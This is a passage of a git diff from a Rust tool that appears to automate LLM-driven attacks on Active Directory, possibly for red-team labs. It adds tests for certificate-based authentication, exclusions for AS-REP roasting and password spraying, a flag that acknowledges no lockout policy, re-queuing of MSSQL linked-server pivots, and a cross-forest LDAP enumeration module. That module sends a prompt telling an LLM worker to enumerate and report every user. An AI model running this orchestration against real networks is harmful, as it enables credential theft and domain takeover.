+ target: "192.168.58.10".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_no_work() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_certificate_obtained_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("target_user".into(), serde_json::json!("administrator"));
+ s.discovered_vulnerabilities.insert(
+ "cert-001".into(),
+ make_vuln("cert-001", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_id, "cert-001");
+ assert_eq!(work[0].pfx_path, "/tmp/admin.pfx");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].target_user, "administrator");
+ assert_eq!(work[0].dedup_key, "cert_auth:cert-001");
+ assert!(work[0].dc_ip.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_adcs_certificate_vuln_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx"));
+ details.insert("domain".into(), serde_json::json!("fabrikam.local"));
+ details.insert("target_user".into(), serde_json::json!("svc_sql"));
+ s.discovered_vulnerabilities.insert(
+ "cert-002".into(),
+ make_vuln("cert-002", "adcs_certificate", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_id, "cert-002");
+ assert_eq!(work[0].domain, "fabrikam.local");
+ assert_eq!(work[0].target_user, "svc_sql");
+ }
+
+ #[tokio::test]
+ async fn collect_ignores_non_cert_vuln_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ s.discovered_vulnerabilities
+ .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details));
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_exploited_vulnerabilities() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-010".into(),
+ make_vuln("cert-010", "certificate_obtained", details),
+ );
+ s.exploited_vulnerabilities.insert("cert-010".into());
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_already_deduped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-020".into(),
+ make_vuln("cert-020", "certificate_obtained", details),
+ );
+ s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into());
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_vuln_without_pfx_path() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // No pfx_path, certificate_path, or cert_file key at all
+ let mut details = std::collections::HashMap::new();
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-030".into(),
+ make_vuln("cert-030", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_pfx_fallback_to_certificate_path() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("certificate_path".into(), serde_json::json!("/tmp/alt.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-040".into(),
+ make_vuln("cert-040", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].pfx_path, "/tmp/alt.pfx");
+ }
+
+ #[tokio::test]
+ async fn collect_pfx_fallback_to_cert_file() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-050".into(),
+ make_vuln("cert-050", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].pfx_path, "/tmp/other.pfx");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_defaults_to_administrator() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ // No target_user, upn, or account_name
+ s.discovered_vulnerabilities.insert(
+ "cert-060".into(),
+ make_vuln("cert-060", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "administrator");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_from_upn() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("upn".into(), serde_json::json!("admin@contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-070".into(),
+ make_vuln("cert-070", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "admin@contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_from_account_name() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ details.insert("account_name".into(), serde_json::json!("svc_web"));
+ s.discovered_vulnerabilities.insert(
+ "cert-080".into(),
+ make_vuln("cert-080", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "svc_web");
+ }
+
+ #[tokio::test]
+ async fn collect_resolves_dc_ip_from_domain_controllers() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-090".into(),
+ make_vuln("cert-090", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, Some("192.168.58.10".into()));
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_none_when_domain_not_mapped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // DC registered for a different domain
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-100".into(),
+ make_vuln("cert-100", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dc_ip.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_domain_defaults_to_empty_string() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ // No domain key in details
+ s.discovered_vulnerabilities.insert(
+ "cert-110".into(),
+ make_vuln("cert-110", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_vuln_type() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ details.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-120".into(),
+ make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()),
+ );
+ s.discovered_vulnerabilities.insert(
+ "cert-121".into(),
+ make_vuln("cert-121", "Adcs_Certificate", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_mixed_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // Valid cert vuln
+ let mut d1 = std::collections::HashMap::new();
+ d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx"));
+ d1.insert("domain".into(), serde_json::json!("contoso.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-200".into(),
+ make_vuln("cert-200", "certificate_obtained", d1),
+ );
+
+ // Non-cert vuln (should be ignored)
+ let mut d2 = std::collections::HashMap::new();
+ d2.insert("target_ip".into(), serde_json::json!("192.168.58.22"));
+ s.discovered_vulnerabilities.insert(
+ "vuln-smb".into(),
+ make_vuln("vuln-smb", "smb_signing_disabled", d2),
+ );
+
+ // Another valid cert vuln
+ let mut d3 = std::collections::HashMap::new();
+ d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx"));
+ d3.insert("domain".into(), serde_json::json!("fabrikam.local"));
+ s.discovered_vulnerabilities.insert(
+ "cert-201".into(),
+ make_vuln("cert-201", "adcs_certificate", d3),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 2);
+ let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect();
+ assert!(ids.contains("cert-200"));
+ assert!(ids.contains("cert-201"));
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_lookup_is_case_insensitive() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // DC stored under lowercase
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ // Domain in mixed case in vuln details
+ details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL"));
+ s.discovered_vulnerabilities.insert(
+ "cert-130".into(),
+ make_vuln("cert-130", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, Some("192.168.58.10".into()));
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs
index 0baeb0a7..a30f0cf0 100644
--- a/ares-cli/src/orchestrator/automation/credential_access.rs
+++ b/ares-cli/src/orchestrator/automation/credential_access.rs
@@ -101,10 +101,16 @@ pub async fn auto_credential_access(
};
for (domain, dc_ip) in asrep_work {
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(&domain);
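+ // excluded_users is a list of usernames; e.g. ["krbtgt", "guest"]
+ // serializes as "krbtgt,guest" below, and an empty list yields ""
+ // so workers can treat the field as optional.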
let payload = json!({
"techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"],
"target_ip": dc_ip,
"domain": domain,
+ "excluded_users": excluded_users.join(","),
});
let priority = dispatcher.effective_priority("asrep_roast");
@@ -150,14 +156,14 @@ pub async fn auto_credential_access(
if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) {
return None;
}
- // Exact domain match first
- if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() {
+ // Exact domain match first (using robust DC resolution)
+ if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) {
return Some((dedup, dc_ip, cred_domain, cred.clone()));
}
// Fallback: check child domains (e.g. cred has "contoso.local"
// but user is actually in "child.contoso.local")
let suffix = format!(".{cred_domain}");
- for (domain, dc_ip) in &state.domain_controllers {
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
if domain.ends_with(&suffix) {
debug!(
cred_domain = %cred_domain,
@@ -215,6 +221,10 @@ pub async fn auto_credential_access(
.users
.iter()
.filter(|u| !u.domain.is_empty())
+ // Skip AD built-in disabled accounts (guest, krbtgt, etc.).
+ // Spraying these can never succeed and burns badPwdCount budget
+ // that real accounts share under domain lockout policy.
+ .filter(|u| !ares_core::models::is_always_disabled_account(&u.username))
// Skip delegation accounts — their auth budget is reserved for
// S4U exploitation. Spraying them causes lockout before S4U fires.
.filter(|u| !state.is_delegation_account(&u.username))
@@ -256,10 +266,16 @@ pub async fn auto_credential_access(
}
sprayed_domains.insert(domain.clone());
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(domain);
let payload = json!({
"technique": "username_as_password",
"target_ip": dc_ip,
"domain": domain,
+ "excluded_users": excluded_users.join(","),
});
match dispatcher
@@ -510,12 +526,19 @@ pub async fn auto_credential_access(
};
for (domain, dc_ip) in common_spray_work {
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(&domain);
let payload = json!({
"techniques": ["password_spray", "username_as_password"],
"reason": "low_hanging_fruit",
"target_ip": dc_ip,
"domain": domain,
"use_common_passwords": true,
+ "acknowledge_no_policy": true,
+ "excluded_users": excluded_users.join(","),
});
// Mark as processed BEFORE submitting to prevent duplicate deferred entries.
@@ -552,6 +575,8 @@ pub async fn auto_credential_access(
mod tests {
use super::*;
+ // --- kerberoast_dedup_key ---
+
#[test]
fn kerberoast_dedup_key_basic() {
assert_eq!(
@@ -573,6 +598,8 @@ mod tests {
assert_eq!(kerberoast_dedup_key("", ""), "krb::");
}
+ // --- spray_dedup_key ---
+
#[test]
fn spray_dedup_key_basic() {
assert_eq!(
@@ -591,6 +618,8 @@ mod tests {
assert_eq!(spray_dedup_key("", ""), ":");
}
+ // --- common_spray_dedup_key ---
+
#[test]
fn common_spray_dedup_key_basic() {
assert_eq!(
@@ -604,6 +633,8 @@ mod tests {
assert_eq!(common_spray_dedup_key(""), "common:");
}
+ // --- low_hanging_dedup_key ---
+
#[test]
fn low_hanging_dedup_key_basic() {
assert_eq!(
@@ -617,6 +648,8 @@ mod tests {
assert_eq!(low_hanging_dedup_key("", ""), ":");
}
+ // --- credential_secretsdump_dedup_key ---
+
#[test]
fn credential_secretsdump_dedup_key_basic() {
assert_eq!(
@@ -639,6 +672,8 @@ mod tests {
assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::");
}
+ // --- resolve_host_domain_from_fqdn ---
+
#[test]
fn resolve_host_domain_from_fqdn_typical() {
assert_eq!(
@@ -673,6 +708,8 @@ mod tests {
assert_eq!(resolve_host_domain_from_fqdn(""), "");
}
+ // --- is_host_domain_related ---
+
#[test]
fn is_host_domain_related_same_domain() {
assert!(is_host_domain_related("contoso.local", "contoso.local"));
diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs
index 773af2d6..dcae7770 100644
--- a/ares-cli/src/orchestrator/automation/credential_expansion.rs
+++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs
@@ -8,8 +8,9 @@
use std::sync::Arc;
use std::time::Duration;
+use redis::AsyncCommands;
use tokio::sync::watch;
-use tracing::debug;
+use tracing::{debug, info};
use crate::orchestrator::dispatcher::Dispatcher;
use crate::orchestrator::state::*;
@@ -319,7 +320,11 @@ pub async fn auto_credential_expansion(
// This is the fastest path from hash → krbtgt → DA.
{
let state = dispatcher.state.read().await;
- let dc_ips: Vec<String> = state.domain_controllers.values().cloned().collect();
+ let dc_ips: Vec<String> = state
+ .all_domains_with_dcs()
+ .into_iter()
+ .map(|(_, ip)| ip)
+ .collect();
drop(state);
if !dispatcher.is_technique_allowed("secretsdump") {
@@ -378,7 +383,120 @@ pub async fn auto_credential_expansion(
.await;
}
}
+
+ // 5. Re-dispatch unsuccessful mssql_access vulns when a new same-domain
+ // cleartext credential is available. Cross-forest MSSQL pivots fail
+ // if the LLM tries them before any usable cred exists in the linked
+ // server's source forest — once that cred arrives, push the vuln
+ // back into the exploitation ZSET so the LLM gets another shot
+ // with the new credential set in its prompt context.
+ let retries = collect_mssql_retries(&dispatcher).await;
+ for retry in retries {
+ if let Err(e) = requeue_mssql_vuln(&dispatcher, &retry).await {
+ debug!(err = %e, vuln_id = %retry.vuln_id, "Failed to requeue mssql_access");
+ continue;
+ }
+ info!(
+ vuln_id = %retry.vuln_id,
+ cred_user = %retry.cred_user,
+ cred_domain = %retry.cred_domain,
+ "Re-queued mssql_access for new credential"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MSSQL_RETRY, retry.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_RETRY, &retry.dedup_key)
+ .await;
+ }
+ }
+}
+
+struct MssqlRetry {
+ vuln_id: String,
+ vuln_json: String,
+ priority: i32,
+ cred_user: String,
+ cred_domain: String,
+ dedup_key: String,
+}
+
+/// Walk discovered vulnerabilities for `mssql_access` entries that are not
+/// yet exploited and have at least one matching unseen credential. Builds
+/// a (vuln, credential) work item with a stable dedup key so the same
+/// vuln/cred pair is not re-queued repeatedly.
+async fn collect_mssql_retries(dispatcher: &Arc<Dispatcher>) -> Vec<MssqlRetry> {
+ let state = dispatcher.state.read().await;
+ let mut out = Vec::new();
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type != "mssql_access" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+ let vuln_domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_lowercase();
+ for cred in &state.credentials {
+ if cred.password.is_empty() || cred.domain.is_empty() {
+ continue;
+ }
+ // Match on domain when the vuln carries one. Otherwise match any
+ // cred — the LLM will pick from the prompt's credential list.
+ let cred_dom = cred.domain.to_lowercase();
+ let matches_domain = vuln_domain.is_empty()
+ || cred_dom == vuln_domain
+ || cred_dom.ends_with(&format!(".{vuln_domain}"))
+ || vuln_domain.ends_with(&format!(".{cred_dom}"));
+ if !matches_domain {
+ continue;
+ }
+ let dedup_key = format!(
+ "{}:{}:{}",
+ vuln.vuln_id,
+ cred.username.to_lowercase(),
+ cred_dom
+ );
+ if state.is_processed(DEDUP_MSSQL_RETRY, &dedup_key) {
+ continue;
+ }
+ let Ok(vuln_json) = serde_json::to_string(vuln) else {
+ continue;
+ };
+ out.push(MssqlRetry {
+ vuln_id: vuln.vuln_id.clone(),
+ vuln_json,
+ priority: vuln.priority,
+ cred_user: cred.username.clone(),
+ cred_domain: cred.domain.clone(),
+ dedup_key,
+ });
+ }
}
+ out
+}
+
+/// Push the vuln back into the exploitation ZSET. The exploitation_workflow
+/// loop pops by lowest score; reuse the original priority so the retry
+/// competes fairly with other work.
+async fn requeue_mssql_vuln(
+ dispatcher: &Arc<Dispatcher>,
+ retry: &MssqlRetry,
+) -> anyhow::Result<()> {
+ let key = dispatcher.state.vuln_queue_key().await;
+ let mut conn = dispatcher.queue.connection();
+ let _: () = conn
+ .zadd(&key, &retry.vuln_json, retry.priority as f64)
+ .await?;
+ let _: () = conn.expire(&key, 86400).await.unwrap_or(());
+ Ok(())
}
struct ExpansionWork {
@@ -423,12 +541,12 @@ mod tests {
#[test]
fn netbios_domain_resolution() {
// Simulate the NetBIOS→FQDN resolution logic from the automation loop
- let raw = "NORTH";
+ let raw = "CHILD";
let raw_lower = raw.to_lowercase();
// When netbios_to_fqdn has a mapping, use it
let mut map = std::collections::HashMap::new();
- map.insert("north".to_string(), "north.contoso.local".to_string());
+ map.insert("child".to_string(), "child.contoso.local".to_string());
let resolved = if !raw_lower.contains('.') {
map.get(&raw_lower)
@@ -437,7 +555,7 @@ mod tests {
} else {
raw_lower.clone()
};
- assert_eq!(resolved, "north.contoso.local");
+ assert_eq!(resolved, "child.contoso.local");
// When FQDN is already used, pass through
let fqdn_raw = "contoso.local";
@@ -452,7 +570,7 @@ mod tests {
assert_eq!(resolved2, "contoso.local");
// When no mapping exists, use the raw value
- let unknown = "CHILD";
+ let unknown = "UNKNOWN";
let unknown_lower = unknown.to_lowercase();
let resolved3 = if !unknown_lower.contains('.') {
map.get(&unknown_lower)
@@ -461,7 +579,7 @@ mod tests {
} else {
unknown_lower.clone()
};
- assert_eq!(resolved3, "child");
+ assert_eq!(resolved3, "unknown");
}
#[test]
diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs
index ebacf8dd..3573ab06 100644
--- a/ares-cli/src/orchestrator/automation/credential_reuse.rs
+++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs
@@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher;
const DEDUP_CROSS_REUSE: &str = "cross_reuse";
/// Check if a username is a high-value reuse candidate.
+///
+/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is
+/// derived from the computer's randomly generated 240-byte password and is
+/// bound to that computer object in its source NTDS. The hash will not
+/// authenticate as another machine, in another domain, or in any trusted
+/// forest. Dispatching `secretsdump` with a foreign machine hash always
+/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget.
fn is_reuse_candidate(username: &str) -> bool {
if username.ends_with('$') {
return false;
@@ -87,7 +94,7 @@ pub async fn auto_credential_reuse(
let state = dispatcher.state.read().await;
// Need at least 2 known DCs (implies multiple domains)
- if state.domain_controllers.len() < 2 {
+ if state.all_domains_with_dcs().len() < 2 {
continue;
}
@@ -105,7 +112,7 @@ pub async fn auto_credential_reuse(
for hash in &reuse_candidates {
let hash_domain = hash.domain.to_lowercase();
- for (dc_domain, dc_ip) in &state.domain_controllers {
+ for (dc_domain, dc_ip) in &state.all_domains_with_dcs() {
let target_domain = dc_domain.to_lowercase();
// Skip same domain and parent/child domains (handled by secretsdump.rs)
diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs
new file mode 100644
index 00000000..98d62dfc
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs
@@ -0,0 +1,881 @@
+//! auto_cross_forest_enum -- targeted cross-forest enumeration.
+//!
+//! When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated
+//! that forest's users/groups, this module dispatches targeted LDAP enumeration
+//! using the best available credential path.
+//!
+//! Unlike `auto_domain_user_enum` (which fires once per domain), this module
+//! retries with better credentials as they become available — specifically:
+//! - Cracked passwords from cross-forest secretsdump hashes
+//! - Credentials obtained via MSSQL linked server pivots
+//! - Admin credentials from owned DCs in the foreign forest
+//!
+//! This covers the gap where the trusted forest's users are not enumerated
+//! because initial recon only has primary-forest credentials.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Check if a credential belongs to a different forest than the target domain.
+fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool {
+ let c = cred_domain.to_lowercase();
+ let t = target_domain.to_lowercase();
+ // Same domain or parent/child = same forest
+ !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}")))
+}
+
+/// Build dedup key incorporating the credential to allow retry with better creds.
+fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String {
+ format!(
+ "xforest:{}:{}@{}",
+ domain.to_lowercase(),
+ username.to_lowercase(),
+ cred_domain.to_lowercase()
+ )
+}
+
+fn bind_domain_for_cross_forest(cred_domain: &str, target_domain: &str) -> Option<String> {
+ if cred_domain.trim().is_empty() || cred_domain.eq_ignore_ascii_case(target_domain) {
+ None
+ } else {
+ Some(cred_domain.to_string())
+ }
+}
+
+/// Collect cross-forest enumeration work items from the current state.
+///
+/// Returns an empty vec when there are fewer than 2 domains, no credentials,
+/// or no actionable work to dispatch.
+fn collect_cross_forest_work(state: &StateInner) -> Vec<CrossForestWork> {
+ if state.credentials.is_empty() || state.domains.len() < 2 {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let domain_lower = domain.to_lowercase();
+
+ // Count how many users we know in this domain.
+ let known_user_count = state
+ .credentials
+ .iter()
+ .filter(|c| c.domain.to_lowercase() == domain_lower)
+ .count();
+
+ // Also count hashes for this domain.
+ let known_hash_count = state
+ .hashes
+ .iter()
+ .filter(|h| h.domain.to_lowercase() == domain_lower)
+ .count();
+
+ // Skip domains where we already have good coverage
+ // (at least 5 credentials or 10 hashes = likely already enumerated).
+ if known_user_count >= 5 || known_hash_count >= 10 {
+ continue;
+ }
+
+ // Find the best credential for this domain.
+ // Priority: same-domain cred > admin cred > same-forest cred > cross-forest cred.
+ let best_cred = state
+ .credentials
+ .iter()
+ .filter(|c| {
+ !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .min_by_key(|c| {
+ let c_dom = c.domain.to_lowercase();
+ if c_dom == domain_lower {
+ 0 // Same domain = best
+ } else if c.is_admin {
+ 1 // Admin from another domain = good (trust auth)
+ } else if !is_cross_forest(&c_dom, &domain_lower) {
+ 2 // Same forest = acceptable
+ } else {
+ 3 // Cross-forest = may work via trust
+ }
+ })
+ .cloned();
+
+ let cred = match best_cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain);
+ if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) {
+ continue;
+ }
+
+ items.push(CrossForestWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ is_under_enumerated: known_user_count < 3,
+ });
+ }
+
+ items
+}
+
+/// Dispatches targeted user + group enumeration for foreign forests.
+/// Interval: 45s.
+pub async fn auto_cross_forest_enum(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ // Wait for initial credential discovery and cross-domain pivots.
+ tokio::time::sleep(Duration::from_secs(120)).await;
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("cross_forest_enum") {
+ continue;
+ }
+
+ let work: Vec<CrossForestWork> = {
+ let state = dispatcher.state.read().await;
+ collect_cross_forest_work(&state)
+ };
+ if work.is_empty() {
+ continue;
+ }
+
+ for item in work {
+ // Dispatch user enumeration
+ let mut user_payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": [
+ "sAMAccountName", "description", "memberOf",
+ "userAccountControl", "servicePrincipalName",
+ "msDS-AllowedToDelegateTo", "adminCount"
+ ],
+ "cross_forest": true,
+ "instructions": concat!(
+ "This is a cross-forest enumeration task. Enumerate ALL users in the ",
+ "target domain via LDAP. If the credential is from a different domain, ",
+ "authenticate via the forest trust. Report every user found with their ",
+ "group memberships, SPNs, delegation settings, and description fields. ",
+ "Pay special attention to accounts with adminCount=1, ",
+ "DoesNotRequirePreAuth, or interesting SPNs.\n\n",
+ "IMPORTANT: For each user found, include them in the discovered_users ",
+ "array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n",
